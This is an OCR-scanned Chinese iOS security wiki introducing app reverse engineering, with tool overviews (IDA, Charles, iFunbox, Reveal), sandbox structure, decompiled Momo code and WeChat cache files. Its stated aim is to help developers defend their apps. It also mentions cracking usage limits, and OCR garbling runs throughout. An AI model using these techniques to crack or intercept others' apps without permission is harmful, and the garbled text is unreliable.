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Why 


iOS Security (http://security.ios-wiki.com) 源 于 之 前 在 我 的 博客 翻译 的 关于 iOS 安 全 的 一 系列 文 
章 。 创 建 iDS Security 这 个 站 点 的 目的 就 是 让 所 有 的 iOS 开 发 者 都 能 具备 一 定 的 安全 知识 ， 能 
方便 的 学 习 关 于 iOS 安 全 的 基础 知识 。 


深 感 于 个 人 知识 浅薄 和 有 限 ， 这 里 决定 把 文章 开源 ， 布 望 感 兴 趣 的 朋友 帮忙 修改 和 完善 文 
草 ， 增 加 新 的 草 节 会 尤为 欢迎 。 


希望 通过 大 家 的 努力 ， 能 够 让 我 们 的 iOS 应 用 更 加 安全 ， 让 用 户 能 够 放心 使 用 大 家 的 应 用 。 
也 欢迎 大 家 订阅 iOS 技 术 周 报 (http://weekly.ios-wiki.com/) 和 提交 好 文章 到 iDS 


News (http://news.ios-wiki.com/news) 


How 


如 果 只 是 想 提 出 小 的 修正 的 话 ， 您 可 以 给 我 提交 issue 。 或 者 fork 本 项 目 ， 在 draft 中 进行 修 
正 后 给 我 发 pull-request 。 
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本 系列 文章 将 对 iDOS 逆 向 工程 的 基本 流程 ， 以 及 涉及 到 的 工具 进行 简要 的 介绍 。 
维基 百科 对 逆向 工程 的 定义 如 下 : 
逆向 工程 〈 又 称 反 向 工程 ) ， 是 一 种 技术 过 程 ， 即 对 一 项 目标 产品 进行 逆向 分 析 及 研 


完 ， 从 而 演绎 并 得 出 该 产品 的 处 理 流 程 、 组 织 结 构 、 功 能 性 能 规格 等 设计 要 条， 以 制作 
出 功能 相近 ， 但 又 不 完全 一 样 的 产品 。 逆 向 工程 源 于 商业 及 军事 领域 中 的 硬件 分 析 。 
需要 逆向 工程 的 原因 如 下 : 

e 接口 设计 。 由 于 互 操作 性 ， 逆 向 工程 被 用 来 找 出 系统 之 间 的 协作 协议 。 

e 军事 或 商业 机 和 贺 。 和 妇 取 敌人 或 苑 争 对 手 的 最 新 研究 或 产品 原型 。 

e 学术/ 学 习 目 的 。 

e 去 除 复制 保护 和 伪装 的 登录 权限 。 

e 产品 分 析 : 用 于 调查 产品 的 运作 方式 ， 识 别 潜在 的 侵权 行为 。 


写本 系列 文 草 是 让 开发 者 了 解 攻击 者 能 够 做 的 事情 “AFL HF” oo AM RILA RA HDB 
针对 这 些 攻击 、 破 解 行为 ， 更 好 的 设计 和 编码 ， 提 供 iOS 应 用 的 安全 性 。 


#1 iOS 逆 向 工程 简介 下 的 更 多 文章 


对 于 iOS App 开 发 者 来 说 ， 只 是 完成 产品 的 需求 是 远 远 不 够 的 ， 需 要 考虑 安全 方面 的 问题 。 


对 于 微 信 、 陌 隔 、 来 往 、QQ、WhatsApp 等 IM 工 具 ， 我 们 需要 关注 其 在 本 地 是 否 保存 聊天 信 
息 、 联 系 人 ; 对 于 电 商 类 App， 我 们 需要 关注 交易 环节 是 否 安全 ， 网 络 请 求 是 否 安 全 ; 对 这 些 
关键 环节 的 安全 上 的 评估 ， 就 需要 用 到 iOS 逆 向 工程 。 


对 于 需要 用 户 注 册 和 登录 的 应 用 来 说 ， 用 户 的 密码 是 如 何在 网 络 上 传输 的 、 在 本 地 是 否 保 存 
明文 密码 、 聊 天 信息 、 联 系 人 ， 这 些 都 可 以 通过 遂 向 工程 的 手段 来 进行 分 析 。 


iOS 逆 向 工程 ， 就 是 拿 到 应 用 的 关键 信息 ， 基 于 这 些 信息 的 用 途 ， 可 以 有 如 下 的 分 类 ; 


© 
e 分 析 ; 
AE. 1 


e T5 


安全 审计 


AME 司 都 会 有 相应 的 安全 团队 ， 会 负责 各 个 业务 的 安全 问题 ， 也 会 对 jiOS App 的 安全 性 进 
行内 部 的 审计 和 分 析 ， 及 早 发 现 和 反馈 ， 以 便 开 发 团队 的 同学 能 够 及 早 修 正 问 题 。 


分 析 和 恶意 软件 


种 一 般 是 对 安全 特别 感 兴趣 或 者 是 杀毒 软件 公司 ， 会 对 恶意 软件 进行 分 析 ， 以 便 发 出 预 
iei 


借鉴 别人 的 软件 


有 时 候 想 了 解 下 别人 用 的 第 3 方 库 有 哪些 ， 花 至 关键 地 方 是 如 何 实现 的 ， 特 别 是 对 于 越狱 后 的 
东 些 应 用 ， 想 了 解 其 实现 原理 ， 就 需要 用 到 逆向 工程 。 


破解 使 用 限制 


通过 逆向 工程 ， 可 以 分 析出 软件 使 用 限制 所 利用 的 机 制 ， 能 够 对 关键 的 地 方 打 补丁 ， 破 解 相 
应 的 使 用 限制 。 这 种 在 Windows 和 平台 上 存在 很 久 。 比 如 最 近 有 些 文章 ， 介 绍 如 何 破解 Reveal 
的 使 用 限制 、 去 抒 过 期 的 弹 框 等 文章 ， 就 用 到 了 iOS 逆 向 工程 的 相关 知识 。 


#1 iOS 逆 向 工程 简介 下 的 更 多 文章 


对 iOS 应 用 进行 逆向 分 析 的 方法 可 以 大 致 分 为 两 类 : 


e 静态 分 析 (static analyze) 
e 动态 分 析 (dynamic analyze) 


静态 分 析 


顾名思义 ， 静 态 分 析 法 是 在 不 执行 OS 应 用 的 情形 下 ， 对 应 用 进行 静态 分 析 的 一 种 方法 。 上 比如 
获取 应 用 的 文件 系统 结构 ， 本 地 文件 的 分 析 、 使 用 反 汇 编 工具 (Disassembler ， 比 如 IDA) Æ 
看 内 部 人 代码， 分析 代 码 结 构 也 是 静态 分 析 。 


动态 分 析 


动态 分 析 法 是 在 iOS 应 用 的 执行 过 程 中 进行 动态 分 析 的 一 种 方法 ， 通 过 调试 来 分 析 代 码 ， 获 得 
内 存 的 状态 等 等 。 通 过 动态 分 析 法 ， 可 以 在 观察 应 用 的 文件 、 网 络 等 。 动 态 分 析 中 还 常 使 用 
调试 器 (Debugger， 比 如 gdb) 分 析 应 用 的 内 部 结构 与 原理 。 甚 至 可 以 使 用 工具 (比如 
Cycript， 后 面 会 详细 介绍 该 工具 ) 动态 修改 内 存 ， 给 内 存 打 补丁 。 


在 进行 OS 北向 工程 的 时 候 ， 建 议 两 种 方法 都 采用 ， 通 党 是 先 静态 分 析 下 收集 应 用 的 相关 信 
息 ， 然 后 使 用 动态 分 析 获 得 进一步 的 信息 。 灵 活 的 使 用 这 两 种 方法 ， 可 以 大 大 提供 分 析 效 
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要 进行 iDOS 逆 向 工程 ， 建 议 学 握 iOS 应 用 的 开发 相关 知识 ， P $ 


FiOS% 6 22 YN — ^ X A 3L 7C T. .R- 
倍 。 其 至 可 以 做 之 前 可 能 根本 没 想 到 外 


介绍 的 工具 可 以 分 为 如 下 几 类 : 


e U| 分 析 工 具 

e 文件 系统 查看 工具 
e 数据 库 查 看 工具 
e 网 络 分 析 工 具 

e 逆向 程序 开发 工具 
e 反 汇 编 工 具 

e 调试 器 


UI 分析 工具 
UI 分 析 工 具 是 对 iOS 应 用 的 Ul 进行 


Reveal fé 42 7 35 1 
各 种 用 户 界 面 参 


f| P 44 -InfoQ 


使 用 Reveal 的 效果 如 图 


App Store (jamz-touch) C) ulScreen 


. App Store 2.0 
jamz-touch (iOS 7.0.6) 
LAB UlScreen: Main Screen 
v 'UIWindow 
v: ‘UlLayoutContainerView 
v: ‘UlTransitionView 
v'i ‘UlViewControllerWrapperView 
v: ‘UlLayoutContainerView 
Vv: ‘UINavigationTransitionView 
v: ‘UlViewControllerWrapperView 
vi 'UlView 
YI IUIView 
v [::UICollectionView 
vw: ‘SKUISimpleCollectionViewCell 
YI IUIView 
v'i ‘SKUISWooshView 
‘1 UIView 
> æ UiButton 
网 UILabel 
v (=) UlCollectionView 
v' ‘SKUISoftwareSwoo: 
v'i ‘UlView 

[2] SKUICellimag 


ATURE To 
ARELA 
ARIELA 
b: :SKUlSoftwareSwoo: 
v' ‘SKUISoftwareSwoo: 
vi ‘UlView 
[Z] SKUICellimag 


ARIETA 


La cus P 


使 用 PonyDebugger 的 效果 如 图 


分 析 的 工具 ， 


的 使 用 ， 工 欲 善 其 事 ， 必 先 利 其 器 
E ag BC a) SE HP o 


于 时 调试 和 修改 IOS 应 用 程序 。 它 能 
Hoi RH KATA RE FF UIE 
一 样 ， 在 不 需要 重 写 代码 、 重 新 构建 和 重新 部 署 应 用 程 


5s ae ries 


Best Naw X 


"e 
Ths nos 


Best New Sames 


有 Reveal 和 PonyDebugger 等 。 


连接 到 应 用 程序 


。 用 好 工具 可 以 事 半 功 


> 并 人 允许 开发 者 编辑 


» 就 像 用 FireBug 调 试 HTML 页 面 


序 的 情况 下 就 能 


Application 


Icon Badge Number 


State 


Status Bar Frame 


Status Ba...ientation 


Status Bar Animation 


Device 


Identifier for Vendor 
Name 

Model 

Localized Model 


System Name 


Free trial ends in 14 days 


0 


Active 


d 


Portrait 


0.3 


51080FE4-1643-45C3... 
jamz-touch 
iPod touch 
iPod touch 


iPhone OS 


够 调试 和 修改 iDS 


(C 
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ca em 





lE] search.json application/json Other 12.64KB 266ms | Lu 

[e] — GET 200 image/jpeg Other 1.59KB 24ms Ow 
F photo normal.jpeg GET 200 image/jpeg Other 4.04KB 25ms du 
[acl SES6CS5SE1-BDCA-4E... GET 200 image/jpeg Other 1.64KB 22ms = 
E, overloadut 64 norma... GET 200 image/jpeg Other 1.07KB 19ms ud 
区 gre5 normal.jpg GET 200 image/jneg Other 1.26KB 18ms - 
36C39FBO-1BE1-40A... GET 200 image/jpeg Other 1.87KB 30ms a» 
p nd3xq914iijplSftmrd... GET 200 image/png Other 3.86KB 31ms - 
m 3evg4lhkhvSraw9290... GET 200 image/jpeg Other 1.39KB 28ms = 
á qfksrSe2d4ekcejzwb... GET 200 image/png Other 2.50KB 15ms = 
= Rix normal.jpg GET 200 image/jpeg Other 1.06KB 10ms E 
læ! Screen_shot_2011-03... GET 200 image/png Other 10.14KB 15ms dw 
ig O7lc9fxaxyc5hj9fe22... GET 200 image/jpeg Other 1.88KB l6ms a) 
u n214593 31325577 ... GET 200 image/jpeg Other 1.24KB llims E 
li a34226ce-Ba55-4e3.. GET 200 image/png Other 5.41KB Bms © 
ir, me normal.jpg GET 200 image/jpeg Other 2.11KB 14ms S 


E. = a = 0 O Kan | Documents Stylesheets Images Scripts XHR Fonts WebSockets Other ji 


文件 系统 查看 工具 
在 iOS 设 备 上 可 以 安装 iExplorer, iFunbox, iTool 等 工具 ， 可 以 查看 iOS 应 用 的 文件 系统 结构 。 


使 用 iFunbox 打 开 陌 陌 的 文件 目录 ， 如 下 图 所 示 : 
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eoe iFüriBox 
F -. [Tedft iPad | iPad | | 
ES v Folk uen Ted PN == oem em — — mene = 
My Mac ime | Size | Type 
Y S Ted 的 iPad(iPad 3, (0561.2) - (Documents 
e © User Applications - z-- |E Library 
> [E System Applications Li MomoChat.app 
r ae File Sharing | JiTunesArtwork 20 KB 
xr Shortcuts LÀ iTunesMetadata.plist 2 KB property list 
General Storage tmp 
|& Camera 
Œ Cydia App Install 
bij Ringtones 
L3 iBooks 
K3 Voice Memos 
€. Raw File System 
| ldle 


络 分 析 工 具 


使 用 Tcpdump, WireShark, Charles 等 工具 可 以 对 应 用 的 网 络 数据 进行 分 析 。 


使 用 Charles 对 网 络 数据 包 进 行 分 析 的 示意 图 : 
FTE IO YTA 


RC Mthd Host Duration Size Status 
v 200 POST anydo-analytics.herokuapp.com Lore: ios / 3525 ms 801 bytes Complete 


iB 200 POST afternoon-earth- 1266.heroku... /ios calendar med 1706 ms 457 bytes Complete 














POST Y yoz.io pepe 350 bytes Sending requ.. 
CO... graph.facebook.com / 152 bytes Unknown 
POST yoz.io /api/sdk/v1 /batch events 353 bytes Sending requ.. 


Filter: ( Setti 


Oveview RR Response Summary | Chart ^ Notes ) 


POST http://yoz.io/api/viral/v1/get url HTTP/1.1 
Host yoz.io 
yozio-sdk -version IOS-v3.1 
Proxy-Connection keep-alive 
Accept-Encoding gzip, deflate 
Content-Type application/x-www-form-urlencoded 
Accept-Language zh-cn 
Accept */* 
Content-Length 286 
Connection keep-alive 
User-Agent Any.DO/1.16.0.5 CFNetwork/672.1.14 Darwin/14.0.0 
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遂 向 程序 开发 工具 


开发 越狱 程序 和 日 常 开发 的 OS 程序 很 相似 ， 不 过 ， 越 狱 程 序 能 做 更 强大 的 事情 。 你 的 设备 越 
狱 之 后 ， 你 就 能 够 hook 进 Apple 提 供 的 几乎 所 有 的 class， 来 控制 iPhone/iPad 的 功能 。 


Theos 大 幅 简 化 了 编写 越狱 程序 的 流程 ， 后 面 会 对 该 工具 进行 详细 的 介绍 。 


反 汇 编 工 具 
IDA Pro 是 一 款 非 常 强 大 的 反 汇 编 工 具 ， 甚 至 能 够 将 汇编 代码 转换 成 近似 于 源码 的 伪 代 码 。 


如 下 图 所 示 [1] : 


ig PRLS LOC | Le 工 往 县 下 
Pid ^X cdecl -[MomoLocationManager init](struct MomoLocationManager "self, SEL az) 


t MomoLocationManager *v21j; // [sp*Bh] [B5p-14l 
int v22; // [sp*Ch] [bp-10h]81 


/22 = (int)&OBIC CLASS MomoLocationManager; 
vi m obje. msgsendsuperz(&v2l1, "init"): 
i: ( v2) 


vi = óbjec Saree "alloe"); 
ve = obje |magsendi(v "init"; 

w(g Ue qum + 1p = val 

at ose F "Batbelegate:", v2)j 


i RO = n POTEA E 
à . AB8m 
5 
j VLOR Dié; [RU] 
VMÜV R2, R3, DIS 
} 
objec magsend(*((void **);2 + 1j, "aetDesiredAccuracy:", R2); 
. ABm 
VMOV,.F&64 D16, #10.0 
VMOV R2, Ri, Dl6 
} . 
objec masgsend(*((void **)v2 + 1), "setDistanceFilter:", R2); 
ngm 
T VLDR D16, -0.0 
VHMOV Ré, AS, Dé 
vl& e objc quendi LORIC. CLASS KSdate, "dateWithTimeIntervalSincel970:", R6, 4); 
3 obje magSand(v2, "setLastLocTime:", v16)j 
i vi? = obje _magsend(40BJC_ CLASS ë HDContext, "appcConfig ji 
: v18 = obje msgSend(v17, "lastLocation"); 
if ( ivi ) 


18 = objc msgSend[&OBJC CLASS .— MDLocation, "locationWithLat:lng:^, R6, 4, 0, Ù; v2l, v22); 
3 vlij = objc msgsSend(vi5, "toCLLocation"]; 

: ebje msgSend(v2, "setLocation:", v19]; 

obje msgSend(v2, "setReviseLocationr", v15); 

objec magSend(v2, "setFakeLocation:", 0); 


} 
return (id)v2j 
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ff MDLocation - (id)toCLLocation 
id ^ cdecl -[MDLocation tocLLocation](struct MDLocation *self, SEL a2) 
{ 

struct MDLocation “v2; ff rel 

int v4; // r1081 

int wh; // r881 

int vll; // r1181 

int viz; // r501 

void *yvld; // roél 

void *vl16; // roel 


v2 - self; 
R3 = [char *)&self-»1ng; 
v4 = LODWORD(5self-»1ng); 
R5 = (char *)áseolf-»-timpe: 
v6 = LODWORD(self->lat); 
| asm { VLDR D16, [R5] ) 
vil = HIDWORD(self=>lat); 
v12 = HMIDWORD(self--1n4q); 
| asm ( VMOV R2, R3, D16 ) 
objc msgSend(&OBJC CLASS N5Date, "dateWithTimeIntervalSincel1970:", R2); 
vld = obje msg5end(&OBJC CLASS CLLocation, "alloc"]); 
R2 - (int]&v2-*ACC; 


ABS 
{ 
VLDR | D16, [R2] 
VSTA D16, (SP,#0xiC+var_2C] 


vl6 = objc msgSend( 
ur F 
"initWithCoordinate:altitude:horizontalAccuracy:verticalAccuracyitimestamp:", 
vb, 
vil, 
Få F 


uF r] 
Wd o4. | 


Ü, 


return vU ere "autorelease"); 
可 以 看 到 ， 基 本 上 相当 于 源码 。 


Tal 1X 28 


在 iOS 逆 向 工程 中 ， 可 以 使 用 gdb 来 对 iOS 应 用 进行 动态 分 析 ， 进 行 单 步调 试 ， 也 可 以 使 


用 Cycript 来 对 iOS 进 行动 态 分 析 。 


本 文 简要 介绍 了 iOS 逆 向 工程 要 用 到 的 工具 ， 后 面 的 文章 会 对 用 到 的 工具 做 进一步 的 


#1 iOS 逆 向 工程 简介 下 的 更 多 文章 


1.4 iOS 逆 向 工程 用 到 的 工具 简介 
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这 一 章节 对 iOS 逆 向 工程 的 概念 、 动 机 、 以 及 涉及 到 的 工具 进行 简要 的 介绍 。 后 面 的 草 节 
行 详细 的 介绍 。 


y 


Et 


41iOS3iÉ e Lf T2 RSLS 


iOS 3: fF E GUAE AA 


iOS 24 Wiki 


出 于 安全 考虑 ，iOS 系 统 把 每 个 应 用 以 及 数据 都 放 到 一 个 沙 盒 (sandbox) 里 面 ， 应 用 只 能 访 
问 自己 沙 盒 目录 里 面 的 文件 、 网 络 资源 等 (也 有 例外 ， 比 如 系统 通讯 录 、 照 相机 、 有 照片 等 能 
在 用 户 授权 的 情况 下 被 第 三 方 应 用 访问 ) [1] 。 


请 注意 ， 使 用 沙 盒 的 目的 是 为 了 防止 被 攻击 的 应 用 危害 到 系统 或 者 其 他 应 用 ， 它 并 不 能 阻止 
应 用 本 身 被 攻击 ， 因 此 ， 开 发 者 需要 防御 式 的 编程 来 避免 应 用 被 攻击 。 苹 果 官 方 是 这 样 说 
Ay : 


Important: The purpose of a sandbox is to limit the damage that a compromised app 
can cause to the system. Sandboxes do not prevent attacks from happening to a 
particular app and it is still your responsibility to code defensively to prevent attacks. 
For example, if your app does not validate user input and there is an exploitable buffer 
overflow in your input-handling code, an attacker could still hijack your app or cause it 
to crash. The sandbox only prevents the hijacked app from affecting other apps and 
other parts of the system. 


为 了 便于 应 用 组 织 数 据 ， 每 个 沙 盒 内 都 有 几 个 名 字 固 定 的 子 目录 用 来 保存 文件 ， 下 图 是 沙 盒 
的 目录 结构 : 


App Sandbox 







Documents 


C 
Library 





App Sandbox 


---- 





| App Sandbox 


主要 有 4 个 目录 [2] : 
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iOS 24 Wiki 


e MyApp.app 
该 目录 包含 了 应 用 程序 本 身 的 数据 ， 程 序 打 包 的 时 候 的 资源 文件 和 一 些 本 地 文件 就 
是 存放 在 这 个 目录 下 的 。 程序 的 可 执行 程序 、plist 文 件 也 在 这 个 目录 下 。 
这 个 目录 不 会 被 iTunes 同 步 


e Documents 使 用 这 个 目录 来 保存 关键 数据 。 关 键 数 据 指 那些 应 用 不 可 再 生 的 数据 。 
这 个 目录 会 被 iTunes 同 步 


e Library 用 来 保存 一 些 配置 文件 和 其 他 一 些 文 件 。 其 中 使 用 NSUserDefaults 写 的 设置 
数据 都 会 保存 到 Library/Preferences 目 录 下 的 一 个 plist 文 件 中 。Library/Caches 可 以 
用 来 保存 可 再 生 的 数据 ， 比 如 网 络 请 求 ， 用 户 需要 负责 删除 对 应 文件 。 

这 个 目录 (除了 Library/Caches 外 ) 会 被 iTunes 同 步 


e tmp 
使 用 这 个 目录 来 保存 各 种 应 用 下 次 启动 不 再 需要 的 临时 文件 。 当 应 用 不 再 需要 这 些 
文件 的 时 候 ， 需 要 主动 将 其 删除 。 ( 当 应 用 不 再 运行 的 时 候 ， 系 统 可 能 会 将 此 目录 


IE ge 
(Hox 9 ) 


这 个 目录 不 会 被 iTunes 同 步 


获取 主要 目录 路 径 的 方式 
EAE 


NSLog(@"%@", NSHomeDirectory()); 


MyApp.app 


NSLog(@"%@", [[NSBundle mainBundle] bundlePath]); 


tmp 


NSLog(@"%@",NSTemporaryDirectory()); 


Documents 


NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMas 
NSString *docPath = [paths objectAtIndex:0]; 
NSLog(@"%@", docPath); 


j ai 





Library 
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NSArray *paths - NSSearchPathForDirectoriesInDomains(NSLibraryDirectory, NSUserDomainMask 
NSString *libPath = [paths objectAtIndex:0]; 
NSLog(@"%@", LibPath); 





- 





H2 iOS 文 件 系统 及 程序 类 型 下 的 更 多 文章 


iOS 4$ X 7 2-72 3À& : Application, Dynamic Library > & Daemon ° 


在 越狱 的 设备 上 才 会 遇 到 需要 开发 后 面 两 种 类 型 程序 的 情况 。 


Application 


平时 我 们 开发 提交 到 App Store 的 应 用 即 是 Application， 设 备 没 有 越狱 的 情况 下 ， 应 用 只 能 访 
问 沙 盒 内 存 文件 和 数据 。 


Dynamic Library 


Dynamic Library( 动 态 链接 库 )， 在 其 他 平台 很 第 见 ， 比 如 Windows 和 平台 的 DLL。 羊 果 官 方 做 了 
限制 ， 所 以 在 非 越狱 的 情况 下 ， 需 要 提交 到 App Store 的 应 用 是 不 能 包含 动态 链接 库 的 ， 否 则 
无 法 通过 审核 (Review ) 


后 面 要 介绍 的 越狱 程序 (Tweak) 开发 ， 就 是 动态 链接 库 。 我 们 开发 的 大 部 分 越狱 程序 ， 都 是 
编译 成 动态 链接 库 ， 然 后 通过 越狱 平台 的 MobileSubstrate (iOS7.E "I CydiaSubstrate ) 来 加 
载 进 入 目标 程序 (Target) ， 通 过 对 目标 程序 的 挂 钧 Hook) ， 来 实现 相应 的 功能 。 


后 面 会 详细 介绍 越狱 程序 开发 的 原理 ， 会 对 这 个 细节 做 进一步 的 介绍 。 
Ja 8 Daemon 


Ja 8 Daemon & 44 T Windows 89 Service ° 3t T Applicationok 1% > 1144 2] Homes 2 H VP 3 1T * 
而 Daemon 会 在 后 台 运 行 。 在 越狱 设备 上 ， 之 前 用 来 拦截 垃圾 短信 和 电话 的 工具 都 是 运行 在 后 
台 的 Daemon ° 


#2 iOS s fr f AL AE HS ARMUT) S SS 


本 章 简要 介绍 了 iOS 应 用 的 文件 系统 结构 和 iOS 程 序 类 型 ， 了 解 这 些 基 础 知识 能 够 有 利于 后 续 
进行 文件 系统 相关 的 分 析 ， 以 及 编写 越狱 程序 (Tweak) 。 


#2 iOS 文 件 系统 及 程序 类 型 下 的 更 多 文章 


Mac. Ex X 
安装 的 工具 


文件 系统 查看 工具 

在 iOS 设 备 上 可 以 安装 iExplorer, iFunbox, iTool 等 工具 ， 可 以 查看 iOS 应 用 的 文件 系统 结构 。 
我 们 以 iFunbox 为 例子 ， 介 绍 下 其 用 法 。 

下 载 安装 

从 这 里 下 载 iFunbox 最 新 的 Mac 版 本 ， 然 后 安装 。 


打开 iFunbox ， 点 击 左边 的 User Applications， 然 后 点 击 你 想 打 开 的 应 用 的 图 标 ， 比 如 选择 陌 
陌 。 打 开 陌 陌 的 文件 目录 的 示意 图 如 下 所 示 : 








eo iFunBox 
op 9 A8 Cediradimds — 5) — (s: = 
New Folder Refresh GolpLevel Copy From Mac Copy To Mac install App Current Device Switch View 
My Mac | Name Size Type 
* [B Ted 的 iPad(iPad 3, i0S6.1.2) E Documents 
ko User Applications C3 Library 
> [2] System Applications C MomoChat.app 
>» App File Sharing | iTunesArtwork 20 KB 
< Shorteuts 图 iTunesMetadata, plist 2 KB property list 
F) General Storage tmp 
( Camera 
Cydia App Install 
EU Ringtones 
LJ iBooks 


K3 Voice Memos 
€. Raw File System 








| ldle 
选择 东 个 应 用 ， 比 如 打开 微 信 目 录 ， 到 Libraray\WebChatPrivate\Host 下 面 找 到 关于 DNS IP 相 
关 的 文件 ， 然 后 在 对 应 的 文件 上 右键 点 击 ， 会 出 现 一 个 选项 "Copy to Mac”， 能 够 把 对 应 的 文 
件 复 制 到 Mac 上 ， 然 后 就 可 以 利用 Mac 上 的 工具 查看 这 些 文件 了 。 


如 下 图 所 示 : 


t AUAM A. AA 


New Folder Refresh Go Up Level Copy F 


My Mac 
r %® Ted's iPhone(iPhone 4S, iOS7.1.1)[Jailed] 
» User Applications 
> App File Sharing 
Vy Shortcuts 
F1 General Storage 
@ Camera 
© Cameral 
LJ iBooks 
K3 Voice Memos 
€, Raw File System 


eoo 
mobile.getdns2 


[caextshort.weixin.qq.com] 
cacheSecs=1800 
ip=183.61.38.165 
time=1400989937 
[calong.weixin.qq.com] 
cacheSecs=1800 
ip=183.232.98.168 
time=1400989937 
[cashort.weixin.qq.com] 
cacheSecs=1800 
ip=183.61.38.165 
time-1400989937 
[clientip] 
cacheSecs-86400000 


需要 说 明 一 下 ， 我 的 iPhone4s 运 行 
上 面 那 个 iPad 是 越狱 过 的 。 


它 会 记录 你 使 用 


7daysinn401.getdns2 


过 的 WIFI1， 比 如 其 


z, 

Install App 

Name 
7daysinn401.getdns2 
ChinaNet-7Days-219.getdns2 
TP-LINK AOCD38.getdns2 
Tenda, 2B88F8.getdns2 
getdns.ini 
ip.ini 

Y long.weixin.qq.com 

T m.139site.com 
mmbiz.qpic.cn 
mmsns.qpic.cn 


Y pnewsapp.tc.qq.com 
Y short.weixin.qq.com 
wifi.getdns2 
wx.qlogo.cn 
xxx. 2B88F8.getdns2 


| 81k ^ Library » WechatPrivate 5 host | 


47 #+7daysinn401.getdns2 xX fF » A eae F 


[caextshort.weixin.qq.com] 


cacheSecs-1800 
1p=183.232.98.167 
time=1399025111 
[calong.weixin.qq.com] 
cacheSecs=1800 
1p=183.61.38.166 
time=1399025111 
[cashort.weixin.qq.com] 
cacheSecs-1800 
1p-183.232.98.167 
time-1399025111 
[clientip] 
cacheSecs=86400000 
ip-59.62.239.24 
time-1399025111 


® Copy From Mac 
_ mot 


. R 
Ted's iPhone | iPhone 4S -— 一 w 


umen 
ip=117.135.171.194:140.206.160.215:140.207.54.36:101.227 
port=443:8080:80 
timeout=10 

[ LongHostSection] 
hostName-long.weixin.qq.com 


Q^ Refresh 


Ei [1 


ip.ini 


[shortAuthSection] 
ip=117.135.171.159:140.206.160.179:140.206.160.179:101.2 
port= 
Elin 10 
mxsllostSection] 
e-short.weixin.qq.com 


Copy To Mac 





b 


UNREGISTERED , 





的 是 iOS 7.1.1， 没 有 越狱 ， 上 面 图 中 显示 Jailed 有 误 ; 最 


中 一 个 以 WIFI 名 称 开头 的 文件 : 


从 这 个 文件 夹 下 面 ， 可 以 看 出 微 信 对 DNS 的 IP 是 做 了 缓存 处 理 的 。 从 另 一 个 角度 来 看 ， 你 也 


可 以 说 。 


类 似 的 ， 我 们 还 能 
SaQlite3 相 关 工 具 的 那 一 


节 介 绍 ó 


贝 出 存 有 聊天 记录 的 DB 文件 ， 然 后 


后 利用 SQLite3 工 具 来 分 析 ， 这 个 放 到 


可 以 看 到 ， 使 用 iFunbox 和 iTools 能 够 很 方便 的 把 iDS 设 备 上 的 文件 信息 找 贝 出 来 ， 即 使 设备 没 
有 越狱 ， 也 能 够 找 贝 出 应 用 目录 下 的 所 有 文件 。 


#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


简介 


Charles 是 Mac 下 第 用 的 对 网 UE 行 分 析 的 工具 ， 类 似 于 Windows 下 的 Fiddler。 在 开发 
iOS 程 序 的 时 候 ， 往 往 需 要 调试 客 pkg aoe ， 这 个 时 候 就 可 ens | , 


Charles 能 够 拦截 SSL 请 求 、 模 拟 ， ^ 网 络 、 ——— RELIFS KRAK > 7895 E. 
Request 和 Response 等 强大 的 功能 。 下 面 介 绍 安 装 和 使 用 方法 。 

下 载 安 装 

可 以 从 这 里 下 载 Charles， 有 30 天 的 试用 期 。 


安装 后 打开 Charles， 试 用 版 本 会 延迟 后 加 载 。 如 下 图 : 


CNITUHER E EE TUM as P EMT DUAL 2 SNL UAE E REN 


' Charles 


WEB DEBUGGING PROXY 


charlesproxy.com 





This is a 30 day trial version, If you continue using Charles you must : 
- T 7 9 Delaying 1s 


v 3.9.1 
purchase a license. Please see the Help menu for details. 


第 一 次 运行 时 会 弹出 如 下 提示 ， 点 击 Grant Privileges’ ° 





eoo Automatic Mac OS X Proxy Configuration 


Charles can automatically configure your Network Settings 
for use with Charles. This requires that you grant 
privileges to the Charles Proxy Settings application. You 
only need to do this once. Would you like to do this now? 








| NotYet | | Grant Privileges 


Ja AT3F XX € Proxy Proxy Setting > i£ E 35 9 X : 8888。 如 下 图 所 示 : 


iOS 24 Wiki 





ZW Tools Window Help 
V Recording (Session 1) R | C 
Recording Settings... Pp ^ : Ye 
Throttling TE — — 
, Throttle Settings... HT 
> [A https://p12-caldav.icdloud Breakpoints... f* 38K 


Reverse Proxies... 
Port Forwarding... fr 880 


v Mac OS X Proxy ft 88P 
Mozilla Firefox Proxy ‘dF 


Proxy Settings... 

Access Control Settings... 
External Proxy Settings... 
Web Interface Settings... 

Client SSL Certificates... 


| um | 











nares 


OO ADE Proxy Settings - ; 

2. — i 

F) uar ty P ES p : e. - -Proxi Options 55L Mac OSX Mozilla Firefox 
一 一 一 Structure Sequence | HTTP Proxy 


* gg hups://pl2-caldav.icloud.com;443 
Port: 8885 _) Use a dynamic port 


| | Enable transparent HTTP proxying 


SOCKS Proxy 
|_| Enable SOCKS Proxy 
Port: 8889 | |Use a dynamic port 


^ Enable HTTP proxying over SOCKS 
v Include default HTTP ports (80, 443, 8080, 8443) 


Ports: 


Quick Configurations 


Restore Defaults ) ( HTTP Proxy Mode ) ( SOCKS Proxy Mode i 


© Cance) 





支持 拦截 SSL 请 求 
根据 官方 的 文档 : 


卜 实 设备 上 的 设置 方法 
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iOS 4 Wiki 


REE BLES LERSSLEH > EZE > Mhttp://charlesproxy.com/charles.crtF 
载 即 可 。 


下 载 证 书 之 后 ， 双 击 它 ， 会 有 如 下 提示 : 


Do you want your computer to trust certificates signed by 
"Charles Proxy SSL Proxyinq" from now on? 




































1 This certificate will be marked as trusted for the current user only. To 
1 change your decisian later, apen the certificate in Keychain Access and edit 
its Trust Settings. 
i ed Expires | Keychain 
: | Mar 29, 2016, 11:35:39 AM login 
Le Charles Proxy SSL Proxying loai 
ogin 
F login 
| eee lagin 
( Charles Proxy SSL Proxying | (3, 3:10:50 PM -- login 
i Root certificate authority kh. ua FE E —— : 
1 Expires: Friday, September 24, 2038 at 11:19:05 AM Chini 
& This root certificate is not trusted 
P Trust g changes to your Certificate 
w Details . Type your password to allow 
i Subject Name 
t Common Mame Charles Proxy SSL Proxying 
c Organizational Unit http://charlesproxy.com/ssl Name: | | 
Organization XK72 Ltd n Ru—— 
Locality Auckland Password: | | 
State/Province Auckland 
i Counti Nz | 
| | Cancel | | Update Settings 
f CC | 
E Issuer Name suc 
J Bi — riae g Rn g P Tur a E re nup i i- 
Common Name Charles Proxy 55L Proxying [4 9:48:34 PM -- login 
